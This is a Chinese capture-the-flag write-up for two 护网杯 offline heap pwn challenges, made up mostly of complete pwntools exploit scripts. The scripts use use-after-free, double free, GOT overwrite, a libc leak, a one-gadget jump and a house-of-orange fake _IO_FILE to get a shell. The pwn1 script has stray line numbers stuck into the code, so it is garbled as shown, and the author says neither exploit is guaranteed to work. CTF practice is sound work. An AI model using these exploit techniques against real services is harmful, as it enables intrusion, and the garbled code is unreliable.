护网杯_线下

题目不保证能打通,一个师傅发我的题目,pwn2无libc,看程序编译环境,猜测是16.04系统附件

pwn1

UAF,直接利用name的位置构造一个fake chunk,劫持指针修改lock值,实现任意写

from pwn import*
# Echo every byte exchanged with the target process (pwntools DEBUG level);
# handy when a prompt string below does not match, very noisy otherwise.
context.log_level = 'DEBUG'
def menu(ch):
	"""Wait for the menu prompt (ends in 'on...') and send choice *ch* as a line."""
	p.sendlineafter('on...',str(ch))
def new(size,name,content):
	"""Menu 1: allocate a book of *size* bytes with the given name and content.

	*size* is sent as a line; *name* and *content* are sent raw (no newline
	appended), so callers control the exact bytes that land in each buffer.
	"""
	menu(1)
	p.sendlineafter('book:',str(size))
	p.sendafter('name :',name)
	p.sendafter('book:',content)
def free(index):
	"""Menu 2: delete the book at *index* (no check that the slot is live)."""
	menu(2)
	p.sendlineafter('delete??',str(index))
def modify(index,content):
	"""Menu 3: rewrite the book at *index*; *content* is sent raw (no newline).

	Same prompts as edit(), which drives menu 5 instead.
	"""
	menu(3)
	p.sendlineafter('modify',str(index))
	p.sendafter('content:',content)
def rename(name):
	"""Menu 4: replace the user name; *name* is sent raw (no newline)."""
	menu(4)
	p.sendafter('name:',name)
20
def edit(index,content):
	"""Menu 5: write *content* (raw, no newline) into the book at *index*.

	Same prompts as modify(), which drives menu 3 instead.
	"""
	menu(5)
	p.sendlineafter('modify',str(index))
	p.sendafter('content:',content)
24
p = process('./main')
25
elf =ELF('./main')
26
libc =ELF('./libc-2.23.so')
27
p.sendafter('name:','\x00'*0x20 + p64(0) + p64(0x71))
28
new(0x20,'FMYY','fmyy')
29
free(0)
30
free(0)
31
new(0x60,'FMYY','fmyy')
32
new(0x21,p64(0x100000001) + p64(1) + p64(0x602150),'fmyy')
33
free(0)
34
new(0x60,'\x00'*0x40 + p64(0x6020D0),'fmyy')
35
edit(0,p64(0xDEAD2CFEF))
36
modify(0,'\x00'*0x40 + p64(elf.got['free']))
37
edit(0,p64(elf.plt['puts'])[0:7])
38
modify(0,'\x00'*0x40 + p64(0x602390 + 0x18))
39
edit(0,p64(0x602390 + 0x18) + p64(0) + p64(elf.got['read']))
40
free(1)
41
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
42
log.info('LIBC:\t' + hex(libc_base))
43
44
modify(0,'\x00'*0x40 + p64(elf.got['puts']))
45
edit(0,p64(libc_base + 0xF1207))
46
p.interactive()

pwn2

UAF漏洞,利用gift中的malloc 爆破 从而布置堆,partial write修改chunk头 释放进unsorted bin拿到libc,最后利用house of orange 配合scanf时的malloc空间 getshell

from pwn import*
def menu(ch):
	"""Wait for the end of the menu (the 'Exit' entry) and send choice *ch* as a line."""
	p.sendlineafter('Exit',str(ch))
def new(size,content):
	"""Menu 1: allocate *size* bytes and fill them with *content*.

	*size* is sent as a line; *content* is sent raw, so callers append the
	'\\n' themselves where the program expects one.
	"""
	menu(1)
	p.sendlineafter('Size:',str(size))
	p.sendafter('Content:',content)
def free(index):
	"""Menu 2: delete the entry at *index* (no check that the slot is live)."""
	menu(2)
	p.sendlineafter('delete?',str(index))
def show(index):
	"""Menu 3: print the entry at *index*; the caller reads the output."""
	menu(3)
	p.sendlineafter('view?',str(index))
def gift(content):
	"""Menu 5 ("gift"): send *content* as a line without waiting for a prompt."""
	menu(5)
	p.sendline(content)
# Driver for pwn2 as described in the writeup above (UAF; heap shaped via
# the gift() mallocs; a partial overwrite of a chunk header reaches the
# unsorted bin for a libc leak; then a house-of-orange style fake
# _IO_FILE).  Python 2 pwntools style: p64() yields str and is mixed with
# '\n' / '\x00' literals, so this does not run unchanged on Python 3.
p = process('./main')
# The challenge shipped no libc (see the note at the top of the page);
# libc-2.23.so and the raw constants below (0x68, 88, 0x3C37A0) are a
# guess at the Ubuntu 16.04 build.
libc =ELF('./libc-2.23.so')
for i in range(3):
	gift('FMYY')
new(0x18,p64(0) + p64(0x51) + p64(0))
new(0x40,'\x00'*0x30 + p64(0) + p64(0x21))
new(0x40,'FMYY\n')
new(0x40,'FMYY\n')
# Index 1 is freed twice around free(2) -- the use-after-free the writeup relies on.
free(1)
free(2)
free(1)
new(0x40,'\n')
new(0x40,'FMYY\n')
new(0x40,'FMYY\n')
# Presumably the chunk-header overwrite (size 0xA1) the writeup describes,
# so that the following free(1) goes to the unsorted bin -- confirm.
new(0x40,p64(0) + p64(0xA1) + '\n')
free(1)
show(1)
# The leaked pointer is taken as main_arena+88, i.e. __malloc_hook + 0x10 + 88
# on this libc -- the same value unsorted_bins is rebuilt to below.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68
log.info('LIBC:\t' + hex(libc_base))

system = libc_base + libc.sym['system']
binsh=libc_base+next(libc.search('/bin/sh'))
unsorted_bins = libc_base + libc.sym['__malloc_hook'] + 0x10 + 88
IO_list_all = libc_base + libc.sym['_IO_list_all']
# Not an exported symbol, so hard-coded and tied to this exact libc build.
IO_str_jumps = libc_base + 0x3C37A0

fake_IO_FILE  = p64(0) + p64(0x61) + p64(unsorted_bins) + p64(IO_list_all -0x10)#make the IO_list_all ->fd =main_arena+88
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(binsh)
# Zero-pad up to 0xD8, where the vtable pointer is placed, then the two
# fields after it.
fake_IO_FILE = fake_IO_FILE.ljust(0xD8,'\x00')
fake_IO_FILE += p64(IO_str_jumps -8)
fake_IO_FILE += p64(0) + p64(system)

free(3)
free(7)
# Only two 0x40-byte windows of fake_IO_FILE are actually written out.
new(0x40,fake_IO_FILE[0:0x40])
new(0x40,fake_IO_FILE[0xB0:])
# Over-long menu input: per the writeup, the malloc scanf performs for this
# much input is what sets the chain off.
menu('1'*0x500)
p.interactive()